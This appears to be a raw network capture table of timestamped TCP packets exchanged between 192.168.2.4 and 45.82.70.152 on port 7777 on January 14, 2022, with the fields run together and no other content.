                                                                                                                                  Jan 14, 2022 14:10:41.771150112 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771188021 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771188021 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771225929 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771267891 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771282911 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771327019 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771363020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771365881 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771401882 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771435976 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771455050 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771503925 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771543980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771563053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771610975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771651983 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771663904 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771718025 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771754980 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771763086 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771802902 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771840096 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771851063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771909952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.771943092 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.771966934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772027016 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772068977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772084951 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772135973 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772181034 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772192955 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772248983 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772285938 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772286892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772325993 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772368908 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772372007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772417068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772454023 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772483110 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772531033 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772592068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772617102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772639990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772655010 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772692919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772731066 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772733927 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772770882 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772808075 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772818089 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772845984 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772883892 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.772885084 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772945881 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.772986889 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.773000956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773053885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773093939 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773101091 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.773144960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773185968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.773196936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773236990 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773272991 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.773292065 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773346901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773386002 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.773387909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773427963 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773466110 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.773467064 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773504972 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.773540020 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.790801048 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.790838957 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.790872097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.790895939 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.790905952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.790954113 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.790956020 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.790997982 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791039944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791040897 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791079998 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791119099 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791120052 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791160107 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791198015 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791201115 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791237116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791275978 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791275978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791315079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791353941 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791373014 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791410923 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791450977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791457891 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791498899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791534901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791538000 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791575909 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791613102 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791614056 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791651964 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791688919 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791690111 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791734934 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791774988 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791778088 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791819096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791855097 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791857004 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791893959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791930914 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.791932106 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.791970015 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792006016 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792006969 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792045116 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792081118 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792083979 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792124033 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792159081 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792160034 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792200089 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792237043 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792237043 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792275906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792311907 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792314053 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792352915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792388916 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792391062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792445898 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792481899 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792483091 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792521000 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792557955 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792562008 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792599916 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792634964 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792650938 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792690039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792726040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792726040 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792766094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792803049 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792809963 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792843103 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792879105 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792881966 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792918921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792953968 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.792957067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.792994976 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.793030977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.793031931 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.793071032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.793107986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.793112040 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.793148041 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.793185949 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.798662901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798707962 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798747063 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798753977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.798789024 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798829079 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798829079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.798870087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798917055 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.798922062 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.798964024 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799001932 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799002886 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799041986 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799081087 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799082994 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799120903 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799160004 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799160004 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799199104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799232960 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799237013 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799277067 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799314022 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799314976 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799354076 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799396038 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799403906 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799458981 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799496889 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799499989 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799537897 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799573898 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799578905 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799618006 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799654007 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799657106 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799690962 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799727917 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799729109 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799774885 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799815893 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799818039 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799855947 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799894094 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.799894094 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799935102 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799971104 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.799982071 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800009012 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800050020 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800051928 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800107002 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800147057 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800151110 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800198078 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800240993 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800241947 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800296068 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800333023 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800343037 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800385952 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800422907 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800425053 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800481081 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800519943 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800527096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800566912 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800605059 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800615072 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800643921 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800679922 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800712109 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800754070 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800796032 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800847054 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800852060 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800887108 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800925970 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.800925970 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.800965071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801006079 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801013947 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801050901 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801084042 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801084042 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801120996 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801156044 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801156044 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801193953 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801230907 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801235914 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801280975 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801316977 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801316977 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801352978 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801388979 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801397085 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801435947 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801470995 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801471949 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801510096 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801557064 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801562071 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801606894 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801641941 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801641941 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801687956 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801727057 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801727057 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801763058 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801801920 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801804066 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801875114 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801915884 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.801924944 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801963091 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.801995993 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802006006 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.802031040 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802066088 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802072048 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.802103996 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802139997 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.802145958 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802181959 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802217960 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802217960 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.802254915 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.802289963 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.818542004 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818588018 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818627119 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818653107 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.818666935 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818702936 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818716049 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.818738937 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818775892 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818792105 CET497787777192.168.2.445.82.70.152
                                                                                                                                  Jan 14, 2022 14:10:41.818810940 CET77774977845.82.70.152192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:41.818846941 CET77774977845.82.70.152192.168.2.4
